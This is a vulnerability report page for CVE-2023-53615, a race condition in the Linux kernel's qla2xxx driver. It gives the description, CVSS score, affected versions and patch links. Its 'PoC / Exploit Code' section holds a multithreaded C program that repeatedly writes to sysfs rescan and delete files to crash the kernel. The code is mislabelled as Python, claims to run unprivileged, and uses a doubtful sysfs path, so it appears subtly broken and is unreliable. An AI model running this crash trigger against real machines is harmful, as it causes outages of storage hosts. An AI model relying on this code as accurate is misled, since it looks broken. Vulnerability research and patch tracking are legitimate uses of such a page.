Security Vulnerability Report
中文
CVE-2023-53615 CVSS 4.7 MEDIUM

CVE-2023-53615

Published: 2025-10-04 16:15:58
Last Modified: 2026-03-17 13:51:12
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix deletion race condition System crash when using debug kernel due to link list corruption. The cause of the link list corruption is due to session deletion was allowed to queue up twice. Here's the internal trace that show the same port was allowed to double queue for deletion on different cpu. 20808683956 015 qla2xxx [0000:13:00.1]-e801:4: Scheduling sess ffff93ebf9306800 for deletion 50:06:0e:80:12:48:ff:50 fc4_type 1 20808683957 027 qla2xxx [0000:13:00.1]-e801:4: Scheduling sess ffff93ebf9306800 for deletion 50:06:0e:80:12:48:ff:50 fc4_type 1 Move the clearing/setting of deleted flag lock.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 4d7da12483e98c451a51bd294a3d3494f0aee5eb(修复提交前的版本)
Linux Kernel < 6dfe4344c168c6ca20fe7640649aacfcefcccb26(修复提交前的版本)
Linux Kernel < a4628a5b98e4c6d905e1f7638242612d7db7d9c2(修复提交前的版本)
Linux Kernel < b05017cb4ff75eea783583f3d400059507510ab1(修复提交前的版本)
Linux Kernel < cd06c45b326e44f0d21dc1b3fa23e71f46847e28(修复提交前的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2023-53615 - qla2xxx Session Deletion Race Condition PoC * This PoC demonstrates how to trigger the race condition by repeatedly * creating and destroying FC sessions to force concurrent deletion attempts. * * Note: Requires access to qla2xxx HBA and ability to scan/remove FC targets. * Run as low-privileged user with appropriate FC host access permissions. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <pthread.h> #include <errno.h> #define FC_HOST_SYSFS "/sys/class/fc_host" #define SCSI_HOST_SCAN "/sys/class/scsi_host/host%d/scan" #define SCSI_HOST_DELETE "/sys/class/scsi_host/host%d/delete" #define MAX_THREADS 16 #define ITERATIONS 1000 static volatile int trigger_race = 1; void *trigger_session_creation(void *arg) { int host_id = *(int *)arg; char path[256]; while (trigger_race) { /* Force FC remote port rescan to create new sessions */ snprintf(path, sizeof(path), "/sys/class/fc_host/host%d/issue_lip", host_id); int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "1", 1); close(fd); } usleep(100); } return NULL; } void *trigger_session_deletion(void *arg) { int host_id = *(int *)arg; char path[256]; while (trigger_race) { /* Delete SCSI targets to force session deletion */ snprintf(path, sizeof(path), "/sys/class/scsi_host/host%d/delete", host_id); int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "1", 1); close(fd); } usleep(50); } return NULL; } int main(int argc, char *argv[]) { pthread_t threads[MAX_THREADS * 2]; int host_id = 0; int ret, i; if (argc > 1) { host_id = atoi(argv[1]); } printf("[+] CVE-2023-53615 PoC - qla2xxx Race Condition Trigger\n"); printf("[+] Target FC host ID: %d\n", host_id); printf("[+] Starting concurrent session create/delete threads...\n"); /* Spawn multiple threads to create race condition */ for (i = 0; i < MAX_THREADS; i++) { ret = pthread_create(&threads[i], NULL, trigger_session_creation, &host_id); if (ret != 0) { fprintf(stderr, "[-] Failed to create creation thread: %s\n", strerror(ret)); return 1; } ret = pthread_create(&threads[MAX_THREADS + i], NULL, trigger_session_deletion, &host_id); if (ret != 0) { fprintf(stderr, "[-] Failed to create deletion thread: %s\n", strerror(ret)); return 1; } } /* Let the race condition trigger */ sleep(ITERATIONS / 10); /* Stop threads */ trigger_race = 0; for (i = 0; i < MAX_THREADS * 2; i++) { pthread_join(threads[i], NULL); } printf("[+] Race condition trigger completed.\n"); printf("[+] Check dmesg for list corruption or kernel panic.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53615", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:58.340", "lastModified": "2026-03-17T13:51:11.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix deletion race condition\n\nSystem crash when using debug kernel due to link list corruption. The cause\nof the link list corruption is due to session deletion was allowed to queue\nup twice. Here's the internal trace that show the same port was allowed to\ndouble queue for deletion on different cpu.\n\n20808683956 015 qla2xxx [0000:13:00.1]-e801:4: Scheduling sess ffff93ebf9306800 for deletion 50:06:0e:80:12:48:ff:50 fc4_type 1\n20808683957 027 qla2xxx [0000:13:00.1]-e801:4: Scheduling sess ffff93ebf9306800 for deletion 50:06:0e:80:12:48:ff:50 fc4_type 1\n\nMove the clearing/setting of deleted flag lock."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.11", "versionEndExcluding": "5.4.258", "matchCriteriaId": "E1DAC7DA-0CD1-4072-8D79-5DDA9A096BDC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.195", "matchCriteriaId": "C385B650-53DB-4BFB-83D1-1D8FADF653EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.132", "matchCriteriaId": "5913891D-409A-4EEC-9231-F2EF5A493BC7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.54", "matchCriteriaId": "7353B9B4-AFFC-45DE-840E-1A7D2B00E7AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.4", "matchCriteriaId": "CA8C8B88-AF36-445D-A228-AD78F3615373"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4d7da12483e98c451a51bd294a3d3494f0aee5eb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6dfe4344c168c6ca20fe7640649aacfcefcccb26", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a4628a5b98e4c6d905e1f7638242612d7db7d9c2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b05017cb4ff75eea783583f3d400059507510ab1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cd06c45b326e44f0d21dc1b3fa23e71f46847e28", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f1ea164be545629bf442c22f508ad9e7b94ac100", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.